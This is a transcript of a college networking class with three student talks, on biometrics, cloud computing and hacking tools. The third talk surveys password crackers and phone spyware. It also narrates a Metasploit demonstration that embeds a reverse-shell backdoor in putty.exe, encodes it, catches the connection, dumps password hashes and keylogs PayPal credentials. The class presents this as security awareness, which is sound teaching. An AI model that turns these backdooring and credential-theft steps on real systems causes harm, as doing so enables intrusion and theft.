Go.
All right, let's give Michael our attention.
Thank you. My presentation is over future of biometrics and security. I think most people know what biometrics is, so I'm not going to get too detailed about the different kind of biometrics there is. We went through that with Chuck in this class. Oh, yeah. Biometrics. I got to go back now. Man, that's slow. Biometrics is measuring and analyzing of biological data. Different kinds of biological biometrics are, you can see DNA, fingerprints, eye retinas and irises, voice patterns, face patterns, hand measurements, and vein geometry. Has anybody ever seen vein geometry biometrics done? They can do it on your hand, your arm, your whole body, it doesn't matter. Your veins never change when you grow up. Of course, they just stretch out. But brief history of biometrics. Behavioral biometrics, is keystroke dynamics. Everybody knows what that is, I hope. Voice recognition, computer footprinting, and your gait, like Chuck talked about before. It's the way you walk, different ways you walk, or if you have a foot problem or something, it's going to show up, in biometrics, whatever, they're going to catch it. The only thing bad about that type of biometrics is if you wear baggy pants, baggy clothes, it does make a difference. It can change from time to time. If you wear tight clothes the next day, it's not going to pick it up the same way. Biometrics goes back to handprints in caves. When some of the Indians, some of the Egyptians used to draw some of the paintings in caves, they used to put their handprint beside all the drawings, and that was their way of putting a signature on, which is a type of biometric. They used to use fingerprints for transactions years ago. Instead of using signatures, they used fingerprints. Biometrics in China, 300-400 years ago, they used to use biometrics, handprints, footprints, to differentiate their children from each other. Now, that's only 300 or 400 years ago. It's kind of hard to believe, but that's what it said at least. That's a weird transition. Biometric security characteristics. The security benefits are that it provides security benefits to IT vendors, to the end users, security system developers, and the users. Identity theft is more challenging than forging a signature, no doubt about it. Same thing. Methods used to increase the security are ensure data is transferred, stored with strong encryption. We all know that's the most important thing because biometrics is probably pretty safe no matter what you use. Fingerprinting, iris scan, retina scan, whatever you use, but it only matters if that information, your personal information, is stored and encrypted, because I might not be able to steal your biometrics, but I can still steal your personal information of everything about you. Use of multi-module biometrics can reduce forgeries. That's where you use, different kinds of biometrics like an iris scan, a fingerprint scan, and let's say keystroke, and talking about keystroke and stuff. Using 2 to 3 different biometrics can definitely make it harder to forge. The iTicket links a person's flyer ticket, flyer number to an iris scan and uses hand geometry to verify citizenship, which is one of the multi-module biometrics. It uses more than one. Biometrics of today. Some of the emerging technologies that need biometric authentication are digital IT, identity and IT, population mobility, reliance on digital transactions, broadband access expansion, and cloud computing. Since it's becoming more popular, biometrics is a great way to do it instead of remembering passwords. That's slow. Facial recognition is used at airports and banks more often. They have 21 airports that are starting to use different facial recognitions around the world. And of course, the United States is behind on all that. Sweden, of course, England, a couple other places, Spain, they all use it. Iris, palm, and facial scanning. All these are used at Department of Defense, Center for Disease Control, law enforcement facilities, immigration facilities, hospitals, and big places like Microsoft and Apple. And of course, there's more than that, but all 3 of these are being used at those places that I could find. Anybody ever heard of the Clear Card? Nobody's heard of that. Okay. My wife's got one. It's a clear card used at 21 airports. I'm sorry, the I-ticket's not used at 21 airports, the clear card is. It's iris and fingerprint info, so you can check through security quicker. So when you walk up, you do a fingerprint iris scan and you run the card through, and you run through a metal detector, but you walk right through it. I mean, it's pretty easy to do. There's pretty much no security guards around there or anything. That's how neat it is. A new thing in Korea is 3D tongue scanning. They say no two tongues are identical. I don't know. It might be, might not be, who knows? But they're doing 3D tongue scanning and stuff, say that your tongue doesn't change that much, plus there's no two that are identical. They're using biometrics in Iraq and Afghanistan. Does anybody know about that? Okay, well, I didn't either. Okay, now we can click on the video. Just a small video kind of show what it's about. It's better to watch it and me explain it. Yeah, just a play thing. It's
Fingerprinting goes high-tech with the incorporation of biometrics. And Air Force Staff Sergeant Rebecca Goodwin shows us how biometrics are being used by U.S. troops in Afghanistan.
Naval Lieutenant Anthony Bravo is one of the many people working behind the scenes to keep military members safe. In his case, he works with the Armed Contractors Oversight Directorate.
Today we are collecting the biometrics, or the life measurements, of potential armed security guards. So what we were doing was collecting photographs, iris scans, and fingerprints.
And while collecting this information, it's best to not take any shortcuts.
It's sweaty, it's hot. It is imperative that when somebody's performing a biometric enrollment that they complete the minimum acceptable standard, 10 fingerprints, 2 irises, and a facial photograph. The reason it's important is any finger can leave a fingerprint.
Once the fingerprint is in the system, it can be identified.
The reason this is important is somebody makes an IED and it is an unexploded ordnance, and even from exploded ordnance, forensics have the ability to pull fingerprints themselves. Therefore, if a fingerprint has been identified on an unexploded ordnance, for example, and then co-located with somebody who's trying to obtain employment as an armed security guard, they will be identified as a threat, change their name, but they can't change their biometrics. It's fixed for life.
And by using biometrics to identify potential threats, Lieutenant Bravo is helping military members stay safe. Air Force Staff Sergeant Rebecca Goodwin, Kabul, Afghanistan.
Yeah, I knew they were using fingerprint biometrics in the military. I just didn't know they were using iris scanning. Still a future of biometrics appearing more at workplaces, businesses, and home. Companies integrating fingerprint recognition with the public and private key cryptology, smart ID cards, which we learned about in here. They have to use, the great thing about it, they have to use both a fingerprint, iris scan, and they still have to use a smart card. And the great thing about this is that all the stuff, the iris scan that you do, the fingerprint, whatever you do, facial recognition, has to match up with the card, the information on the card, and your everything else has to match up with their database. So you have 3 different security things you have to go through. They're using them in stores, fast, secure checkouts. Some places are using fingerprint in California and Florida, I know that. ATMs for immediate authorization. Chicago's got a couple places down there. I've used one before, but it didn't work with mine. Entrance into automobiles, homes, safes, computers, even wallets. I think everybody knows about the automobiles that have, fingerprint touch where you can open them up, unlock them and stuff. It's been around for a while. Homes, we were just talking about that, about putting a fingerprint door lock on your house. Safes, of course. Computers, we all know that. And even wallets. I don't know if anybody's ever seen this wallet. Okay, it was on Discovery Channel, whatever. It's a $600 wallet. So, if you get it stolen, who cares about the money? It ain't crap. But anyways, you're pissed off about losing the wallet. But what's great about it, it's a Kevlar-coated wallet that's made of titanium and does have a biometric fingerprint to even open it. And the guy says it's almost indestructible, which it's kind of hard to believe. But, if you take a sledgehammer to it, what are you going to ruin? You're not going to ruin cash, so it doesn't really matter. Maybe it's just for credit cards mostly. But you can pick those up. You can't get them at Walmart, I don't think, but $600. Future biometric speaker recognition for credit card transaction via the telephone. That's the greatest thing because you can tell, you know, mostly people put their credit cards online, but if you just want to do it over the telephone, the great thing is they have things where they have speaker recognition where they can tell if that's really you or not. Law enforcement will use for facial recognition, palm vein printing. They're starting to use that in California too. Background checks for employers, kind of scary for some people. Fingerprinting, vein printing, pattern, and DNA used in hospitals. That's becoming more accepted too. And that's great because it'll keep all your information and records instead of you having to fill out all this paperwork every time you go to the doctor. Future of biometrics in IT. Will grow and become the standard in authorization, identification, and access used to replace current password system. I mean, that's, of course, that's mostly what biometrics is. But not so much access. It's mostly for identity and it's for authorization both. The reason for this is because passwords need to be changed like every 2 to 3 months. And of course, employees themselves forget to change them. Passwords are forgot, incorrectly entered so many times, and then it floods the IT help desk. There's a scenario. You think to yourself, if you're an IT person walking into a building getting ready to do your daily job, your daily configuring of routers, servers, and switches, stuff like that. Let's say you have to get iris scan, fingerprinted, and then use your smart ID just to get into the building. And then to get into the server room, you have to go through the whole same thing. Let's say you have to do a vein scan. And then you have to fingerprint, smart ID just to log onto the computer. Sounds like a lot, but it's really quick, and most of it's all contactless except for the fingerprint part of it. And then you have to fingerprint password just to get into the configure the hardware to do like a telnet, to do a hyperterminal or something. All this will be done while cameras are using facial recognition, so they can tell it's you. I mean, you have to go through a lot of stuff to get through something security like this. Of course, it's a lot of money, but you know, it's like anything else. Prices are coming down on certain things, certain technologies. Okay, benefits of biometrics for employers: increased security measures, reduced cost of password or ID card management for your employees, reduced payroll cost, the tracking of employees' activities pretty accurately, more than they can just by cameras and stuff. Well, I can't tell if it's even going to go or not. Benefits of biometrics for the employees. Of course, no password remember, no lost password, no stolen ID cards, faster login time, improved security, and can be 100% contactless. I mean, that's great for, you know, germs. I know you the same way. You can walk in, you know, you can be nice to do an iris scan on a computer and just be logged in. Of course, you got to type and everything else, but it's just one extra thing you don't have to touch. And this is kind of my quote I made. The future of biometrics looks promising and does not look as if it's going anywhere anytime soon. For this reason, people should get familiar with it and learn to accept it in society and everyday life. Biometrics can truly make your life easier and more secure. And that's it. Any questions? Pretty boring, but you know, it's a lot of details like he did with, I was telling him his passwords. I didn't get into too much of that because it was kind of overwhelming. I mean, I should have done a little more studying at the beginning of the semester. Yeah.
Is there anything about, I heard something that casinos use the facial recognition?
Well, what it said on there is that it said the hospitals, casinos and stuff were starting to, but I could never find, I got online, was looking up casinos because I love casinos. I couldn't find any place that used them. Now they do use, some of them use facial recognition, but I think in Las Vegas, I'm not sure, but they have to post it that they're doing that, that they're using that technology.
For the people that are banned from the casinos.
Oh, okay. Yeah, I believe that.
Pictures, and they've got it scanning for the people that are banned.
Yeah, that makes sense. But it does say, like in Henderson County and Clark County, which is part of Las Vegas, that they're supposed to post it to tell you that when you walk in. I know it's an establishment, but they're supposed to post it somewhere, which, who knows, it's posted somewhere maybe, who knows. You're not supposed to carry a gun in to a casino, but they don't tell you everywhere. Exactly, behind the toilet, yeah. It's behind the toilet, there it is. Yeah, so you know.
It's kind of obvious, they've got cameras that are in use, facial recognition are in use, so I mean.
Oh yeah, I mean that makes.
Where all over
That makes sense.
the entrances.
Yeah, but I mean, you just don't know what casinos do it because I mean, the whole myth of pumping oxygen in the casinos and stuff, that's a total myth. I mean, everybody thinks that. They pump a lot of alcohol into their,
They do the pumping of the alcohol.
They do that, I know. Is that it? Okay.
Presentations, give me a hand, good job.
Gracias. That's pretty nice.
All right, well,
Goodbye.
let's break into the pizza, and then we'll have the number 2 presenter going. Come on up, get ready. Pizza's ready to break into up here, so get up.
Yeah, the one thing the transition though.
I'm gonna be careful, these boxes are right on the edge, but it has a lip on it, so hopefully. This we could move them here on the end if need be.
Yeah, it's all the apples. Watch back there, buddy. You're missing a call over here too.
You know, I've got a YouTube clip in my presentation.
You do? Okay, I can go ahead and cue it up here. You're going next, right?
No.
Are you last?
Mark is going next.
Okay.
But you'll see it on the slide.
What slide's on? Jersey Attack or Cloud?
Attack. It's way down towards the end. You can see the link right there.
Okay. All right, I'll go ahead and get that queued up.
Go ahead, you got a plate. Thanks. Cheryl, you're doing just great. Just get down out of the way. Yeah, come on, Cheryl. I'm a have to get the bill.
Sorry, who brought the stuff?
Muchas gracias.
Oh, yeah. Yeah.
I sit on that one, Mark.
Yeah. We eat there at least once a month. I love that place. Love that place.
You gotta try pizza.
They have 2 locations, right? They got the one, we go to the one, yeah, we go on Perryville usually.
Yeah, go to
$2 bottle beers, all beers.
$2.
Yeah.
Anywhere you can think of.
The Works pizza is one we like. The thin crust Works. Yeah. The Works has, I like olives, it has green and black olives both on it. Yeah, really good.
You ever been to Stone Eagle?
Stone Eagle. Oh, yeah. Yep.
You ever had a pizza there?
That one's good too, they got a good bar.
No, I've not. I have not.
Right next door.
Pretty good, huh?
They got a little coolers for your beer.
Oh, really?
They got an oven that's in there.
Is it the wood burning oven? Because I heard about that. Okay.
I mean, they brought it.
Yeah, yeah. Yeah, I'll have to try that.
You know all the bars.
Give me a landmark, I'll tell you a bar next to it.
So did everybody get some pizza and something to drink? Good. We'll wait for everyone to start eating, or the presenter for sure to start. No, it's not mine. Oh. No. So whenever you're ready, number 2 is ready, presenter, that'd be great. You don't have to go now. Go ahead and eat your pizza.
No, go ahead.
You're good. You're good, you're good.
I'll go if you don't want to. No, I'll go, this is fine. We'll watch your food for you. This is good.
Few bites up.
I wanted y'all distracted anyways. Let me bother you.
As you can tell, my presentation is going to be on cloud computing today. And after the video, I will describe to you the main components of cloud computing and some of the benefits and some of the detractions of it.
Is that a
YouTube. Technical difficulties.
Yeah, let's eat your pizza and I'll get it ready for you. How's that?
Can I take this off today? Already. And I am Mr. Slade, and this is cloud computing. Maybe. Yeah.
You have big ideas to streamline your business and drive sales through the roof. But to get there, your ideas need business apps. And business apps have always been too expensive, especially in times like these. Behind each one is a world of complexity. They need a data center with office space, power, cooling, bandwidth, networks, servers, and storage. A complicated software stack, and a team of experts to install, configure, and run them. You need development, testing, staging, production, and failover environments. And when there's a problem, good luck. You call technical support, and they don't know, so they blame someone else. Oh, and when new versions come out, you would upgrade, but that might bring the whole system down. Now, this is for one app. When you multiply these headaches across dozens or hundreds of apps, it's easy to see why the biggest companies with the best IT departments aren't getting the apps they need. Small businesses don't have a chance. Cloud computing is a better way to run your business. Instead of running your apps yourself, they run on a shared data center. You just plug in, like a utility. This makes it fast to get started and it costs less. It's like Gmail compared to Microsoft Exchange. With Gmail, do you need servers and storage? No. Do you need a technical team to keep it up and running? No. Do you have to do upgrades? No. When you use any app that runs in the cloud, you just log in, customize it, and start using it. That's the power of cloud computing. This model is so much better, it's changing the way we think about software. Not just for consumer apps, it's also being used for business apps. We call this enterprise cloud computing. Businesses are running all kinds of apps in the cloud these days, including custom-built apps. Why? Because you can be up and running in a few days, which is unheard of with traditional business software. They cost less because you don't need to pay for all the people, products, and facilities to run them. And it turns out they're more scalable, more secure, and are more reliable than the vast majority of apps out there. Here's why. They're based on an architecture called multi-tenancy. With a multi-tenant app, there isn't a copy of the app for each business that's using it. It's one app that everyone shares. But it's flexible enough for everyone to customize for their specific needs. It's like a giant office building where everyone shares the infrastructure and services, like security, yet each business can customize their own office space. This means apps are elastic. They can scale up to tens of thousands of users or down to only a few. Upgrades are taken care of for you, so your apps get security and performance enhancements and new features automatically. Now, the way you pay for cloud apps is also different. Forget about buying servers and software. Your apps run in the cloud, you don't buy anything at all. It's all rolled up into a predictable monthly subscription, so you only pay for what you use. Finally, cloud apps don't eat up your valuable IT resources, so your CFO will love it. And you can focus on projects that really impact the business, like deploying more apps. Cloud computing is a simple idea, but it can have a huge impact on your bottom line. For more information, go to salesforce.com/cloudcomputing.
Is that the... Yep, all right. Currently, right now, the three easiest ways, or the three ways that cloud compute are SaaS, PaaS, and IaaS. It's not pronounced IaaS, but I pronounce it IaaS. Which comes out as software as a service, platform as a service, and infrastructure as a service. All of these allow users to run their applications and store data online, but each offers different types of cloud computing abilities. The easiest one, which we all probably use right now, is SaaS. You run off-the-shelf apps like Gmail, Google Docs, Microsoft, Hotmail, and Microsoft now has their Office web apps, which you can go online, Google Docs, you can sign into Google, write up a paper, save it online, go to any computer anywhere in the world, and you can pull it back up. I mean, it's just that simple. Right now, the major players for SaaS are NetSuite and Salesforce. Salesforce is really, I really had never heard of them until I started doing this research, and they're gigantic in this right now. And NetSuite has a lot of good business apps that a lot of companies use. Some of the advantages, All the apps are either free, like Google Docs or Gmail, or you pay by a subscription. Like I said, anytime, anywhere access for any of this stuff, and there's great collaboration because you can access it from anywhere with an internet connection. Disadvantages of some of the SaaS programs that you don't design yourself is like a normal generic off-the-shelf app might not be good for your business, and you might have to go and design one for yourself to meet your needs. Now, PaaS, we have this allows businesses and users to create their own apps if they need something specific. They're created from the cloud providers' languages and tools that they have. And some of the providers for this is Google has their App Engine, Microsoft has a thing called Azure, and of course Salesforce's Force.com is probably the biggest player right now. The advantages of this is you can go online, you don't even have to, you just log in and you can have an app running within a couple of hours, probably not even. You use a basic template, or you can go in and design it all yourself, kind of like you were writing a program, but they have templates. You go in, just click on what you want with your mouse, click done, and you have like a new accounting app, you have a new attendance app, you have just about anything you want. And you can have it deployed private just in your cloud area, or you can try to sell it or use it for other places, other companies, and make it public, which could make money on it. The disadvantage is, if you're not a big Microsoft fan, you have to use, if you were using Microsoft, you have to use their languages, their tools, and all of their rules. If you like Google, you could use theirs, which they use a lot of open stuff. And of course, there's the possibility that if you create something on a certain cloud provider's cloud, you're stuck there. You can't take the app that you made, even though you made it in their cloud, it's left there. So a lot of proprietary stuff comes into play with that they haven't quite figured out just yet. Then you have IaaS, which basically allows, come on, it allows a company to move all of their existing stuff, everything that they have on their servers, to a cloud provider. All their applications, all their information, all their databases, everything you just hook up and send it up. IaaS allows companies to move, basically if you have a server farm, you know, in Nebraska because land's cheap and electricity's cheap, it's cheaper in the cloud because you rent for the amount of space that you use, and it's a fixed fee unless of course the rates go up, which they will, just like your utilities and everything else. But right now it's pretty cheap. If you get in early right now, you can lock in contracts and save yourself millions. There are 4 different types of IaaS services. There's the private cloud, which this place might want to use something like that. You have a dedicated server for one customer. So if you start a company and you only need, you know, like 4 servers or whatever, you buy those servers or you rent space on those servers and nobody else, you know, basically uses it. Then you have dedicated hosting, which is servers on demand. Christmas time, this is a great time for me to do this because if Amazon online or something like that, and all of a sudden you see a spike in your internet and stuff like that, you need more capacity. It's like a meter, you know, like the meter you have on your house. As more people log in and you need more space or more bandwidth, price goes up. And then when it comes back down, then there's hybrid hosting, which is they use actual servers and virtual servers on demand. And then there's cloud hosting, which is just virtual serving on demand. These are the major cloud players. Amazon's been, their web services, which they are an IaaS provider, they are probably right now the most, they're in the lead, I would say. They are probably making billions of dollars a year on this right now, and you would have never thought. You thought books and they sell stuff. No, they're huge. Acrobat, Intel's getting into it, NetSuite's huge. Google, basically with their Chrome and all their docs and all the other stuff, they're getting in on the SaaS, and then they're trying to move up, which is smart because once you have people hooked on your product, everybody else is going to like it. VMware, Sun, and of course Apple has the iCloud where you can go in, log in, and you can, if you buy movies and stuff and music on iTunes, you can have it pushed to all your devices, which is pretty sweet, I gotta say. And basically, to cloud, the benefits, there's the lowered hardware and software costs, centralized data, which, I mean, you can get to it from anywhere with an internet connection. The cool thing is automatic backups of your client computers and your servers on a daily basis. You don't have to worry about doing that anymore. You put something on there and it's backed up. Easy online document sharing and collaboration. Employee computers will cost less because you're going to be using, if you go with a full service, you're using thin clients. So you don't need the top of the line computer with a terabyte hard drive and 8 gigs of DDR3 RAM or the best, operating system, because guess what? You don't need anything but a little box that's, it's got a network card in it. And of course, the security risks. A lot of companies these days, they don't have the best security. So if you go to the cloud, you're going to have people with hopefully a little bit more knowledge than you have. But of course, not the cloud. I also have that on there. I'll get to that in a second. But you do need a fast internet connection. Satellite internet will not work with this. And right now you can get on with your cell phone, but the connections aren't the fastest, and they are disruptible. The quality of service hasn't been figured out yet. Another big problem is the provider contracts and agreements. Like I say, if you build something on somebody's cloud and you switch to another provider because they're giving you a cheaper rate, all the apps that you made right now are stuck there. So it's kind of like a lock-in. I mean, if they work that good and you want to keep them, you got to stay. And of course, they can use your apps and push them public if they want. So there's a lot of bugs to work out. And the two last are the major. Your company still needs a disaster recovery plan because of the fact that, say, the cloud computing source, their power goes out and they do lose your information. They're not liable to get it back. So once it's gone, it's gone. So you need some sort of backup plan that just to be safe. And of course, security. Once you put all that information in one place, dude, you got some of the best hackers in the world that are going to try to get in there. And it's kind of easy. Right now, they've already had people, they hack into Microsoft and Google, and they can look at just about anything they want, because once they're into everything. And that is it.
Do any of the providers offer it for like a higher fee geographic diversity with the coverage, or is that something they talk about at all?
I did not.
I'm assuming they would, but
They should, but I have not seen a lot. Amazon covers just about anything. They cover from the ground up, and they are all over the globe. They cover just about any type of business, and I haven't seen a more complete cloud provider than Amazon.
Yeah, Amazon's the benefits to Amazon are the fact that you're running an actual Linux instance.
Shoot.
If you download something on the cloud, or download, or should I say, upload something on the cloud, let's say somebody else wants to download it off the cloud, besides, like, let's say you upload something,
Mm-hmm.
I want to get on your account, and I get on there, like, let's say it's like something like Rosetta Stone, like you're putting a fake Rosetta Stone on there, my wife, like, she might.
Okay, next question. I will say this. The IaaS providers like Amazon and some other people, you can use any operating system you want. You can use Linux, you can use Red Hat, you can use any form of that. You can use Microsoft, you can use the first Mac OS that came out if you like it. I mean, you can, anything that you want, they can put on their servers for you. If you want that, get the iCloud, buddy. I'll download it for you. But no, you can't get to my stuff unless I give you, you log in basically with a secure web browser. It's kind of like an SSL connection. You log in, name, ID and password, and it brings you right in like you were on the server, and it's like the stuff was sitting right there on your computer. And a lot of times, depending on your connection, it's faster, because if you have a gigabit connection, it's, you know what I mean, you're looking at it the minute you hit enter. Like around here, if you were to log in, to Eagle, the minute you press enter, all of a sudden your classes everything would be right in front of you instead of the 20-minute wait that we have.
Is there any Google apps that are coming out for consumers that are different than what we have now, like the Google that you saw in your research?
I saw the Google App Engine you can sign up for free right now, and you can make an app, one free app, and post it on Google's. And you can devise anything that you want. You can use, like I say, you can use a template, but you can Google, and there's one other, I think Force.com will let you make and store one free app. After that, you pay.
That'd be a good start for everybody then.
Oh yeah, yep.
All right, well, let's give him a hand. Good job. All right, third presenter, come up. All right, let's give them our attention. It's all yours.
My presentation is on hacking programs. My name is Greg. And our network, our systems are out there. They are exposed and they will be attacked, guaranteed.
The right one's to advance. Right button there to advance.
No one is safe, ever. Hackers will attack anything and everything. There's a reason for that. They've got nothing to lose. They can attack anonymously, and they have abundance of tools to use. There's several methods of attacks that they can use, which we've pretty much covered in class. You got the brute force, fuzzing, cryptanalysis, sniffing, among others. With these attacks, they use dictionary, they use tables, lists, and exploits. We need to get to know these programs as soon as we can before we get more involved in the field. One example of attacks is Aircrack, which has over a dozen tools for cracking 802.11 WEP and WPA. And of course we know Cain and Abel, we went over this one, which has a Unix vulnerability. It uses a dictionary brute force and cryptanalysis. Another example is John the Ripper, which exposes Unix and Linux with hashes using word lists. Then there's the TCH Hydra, which has brute force attacks to crash remote authentication, dictionary attacks on Telnet, FTP, HTTP, SMB, and more. There's OPH Crack, which is a rainbow table-based hash cracker. There's Medusa, which is a brute force login cracker, and this supports AFP, CVS, FTP, HTTP, IMAP, SSH, and more. There's FG Dump, which is a password hasher for HTLM and Landman, and it disables antivirus software before running. There's Loftcraft, which is also known as LC6, and this can sniff out hashes off the wire. SolarWinds, it's a special purpose tool targeting system administrators. Rainbow Crack, which uses a time memory trade-off and pre-computes rainbow tables of plain text before running. There's also WFuzz, which is a brute force attack on web applications. And this can attack SQL, XSS, LDAP, and more. One of the more famous is Brutus, which we've heard before, which is a Windows-only brute force attacker. And this will attack HTTP, POP3, FTP, Telnet, IMAP, NNTP, and many others. You also need to be aware of the latest attacks on mobile devices, which we heard a little bit about protection last week. Some of the programs that are used are Spyria, Sniper Spy, Mobile Spy, and I came across another one last night that attacks droids. These are just specifically for Apple devices, and the way they attack is, well, after they attack, they can monitor everything that you're doing with your phone, text, web access, even conversations. But the way they get in is through jailbreaking. So if you're going to have your phone jailbroke, either do it yourself or someone you trust. Let your family and friends know to either do it themselves or have someone they trust jailbreak the phone, because these programs are inserted after the phone is jailbroke without your knowledge. And the big daddy of all the attack programs right now is Metasploit. It's multifunctional. It's got over 300 exploits. It can attack Unix, Linux, Mac, and Windows. It's web-based and it has GUI interfaces, and the prices on this program range from free to $15,000 for the Pro edition. There's an example of the program there. And I have a video here for us to watch. Shows someone using the Metasploit program. And it's a little lengthy video. It's almost 5 minutes, but I didn't want to use the whole thing, but it's just so fantastic what she does with this program. She hacks into someone's computer within 2.5 minutes, and then she extracts all their passwords.
Okay, welcome. Today we're going to be looking at how to backdoor in our Metasploit. So I've picked a putty and I've put it in my 10 directory. So I'm going to start up by changing my privileges, and I'll start clear up, and let's start up. I'm going to be fast, please, so just follow up. So this is a hello Windows, Metasploit, reverse TCP, localhost is equal to, let me just make if config, and my IPs are 192.168.88.128 narrow. So I encode it, and that's with a -T. This is a Windows binary, -X, my temp file where I've kept my putty.exe, and you can see it down there. So I make it a -K -O/temp putty underscore pro.exe. Now this is just a name that I've generated to give it to make another, so that they don't collide. So I'm going to encode it with a Shikata Garnier and -C the number of times that I want to encode it, and those are 5 times. So I'll wait for a while. And bingo, it's done. We move on. So I can see I have it here down. So right now what I need is to start up my MSF console, and we wait for a little while, and there it is. So I'm going to use my exploit as multi/handler and set my payload to Windows/metapreader/reverse TCP. Lastly, I have to set my localhost. Localhost is equal to 192.168.88.128. Bingo. Oh, sorry, this shouldn't be here. And there we go. I see the options that are available, and looks okay. I start up the exploit. Then we have the port running in 444, listening on 444. This is my victim's computer, so how about I go see what's inside his environment. Sorry. IP config is running on 129, and if I make a net start -A-N, it's pretty clean. Opposite just listening. I click on my putty pro that I just created, and that's our embedded backdoor. So we can see we have the live connection from 4444 via 1327. And what I can do now is a question mark gives me a list of commands that could be helpful. And to start with, I can get the user ID, and I can see Christophe is inside there. Then if I make use brief to a layout, to give me a layout of the system, and make a hash dump, I can see there's a 1, 2, 3, 4, 5, 6 users. Make a key scan to drop the keystrokes, key scanners to start, go to the victim's computer. Instead of say Internet Explorer, and let me see, I can go to our Gmail account. I can also go to our PayPal. Sorry, PayPal is come. Now let's see. Ronnie Cleve, any password can do. Oh no. Anything. Wait. Password. That's okay. This is for, it's not a real password. I go to login in here. Try, run, anything funny. And PayPal, login. So nothing happened. We go back, we make a key scan underscore dump. Well, look at what we have here. We have Gino, we went to PayPal, and we can see clearly we started by running it as our username and the password and the number of times we tried. And then on PayPal, we see the email ID and the user password. And there are lots of things that you can do from here, like you can go get a system. Wait a minute. Oh, it was supposed to be sysinfo. So you can use sysinfo to get a lot of details on your system. Thank you guys. Subscribe and rate my videos. Thank you so much.
So that shows how easy it is. 5 minutes and she has all of your information. Two minutes, 30 seconds to get into the victim's computer. 5 minutes to get all of your passwords and all of your information. Well, the bottom line is keep your friends close and your enemies closer. It's important to know these programs. A network administrator should be able to run all of these programs on their own network to expose flaws in their own system. Auditing a network is easily forgotten in today's busy, hectic environment. Any questions, comments, controversy?
Good presentation. Let's get in. Go ahead and ask your question. We have to take a tour real quick, but go ahead.
The soundtrack on the video? I have no idea.
All right.
I think she gave that presentation through during a rave.
Good job, everyone.